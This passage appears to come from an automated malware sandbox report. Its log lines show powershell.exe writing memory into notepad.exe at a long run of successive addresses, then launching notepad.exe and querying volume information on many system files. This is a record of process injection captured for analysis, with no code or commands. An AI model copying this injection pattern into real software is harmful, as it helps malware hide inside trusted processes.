              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501A8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501A9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501AAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501ABJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501ACJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501ADJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501AEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501AFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501B0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501B1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501B2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501B3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501B4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501B5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501B6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501B7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501B8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501B9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501BAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501BBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501BCJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501BDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501BEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501BFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501C0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501C1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501C2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501C3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501C4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501C5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501C6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501C7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501C8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501C9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501CAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501CBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501CCJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501CDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501CEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501CFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501D0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501D1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501D2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501D3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501D4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501D5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501D6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501D7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501D8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501D9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501DAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501DBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501DCJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501DDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501DEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501DFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501E0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501E1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501E2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501E3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501E4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501E5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501E6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501E7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501E8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501E9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501EAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501EBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501ECJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501EDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501EEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501EFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501F0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501F1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501F2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501F3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\notepad.exe C:\Windows\System32\notepad.exeJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
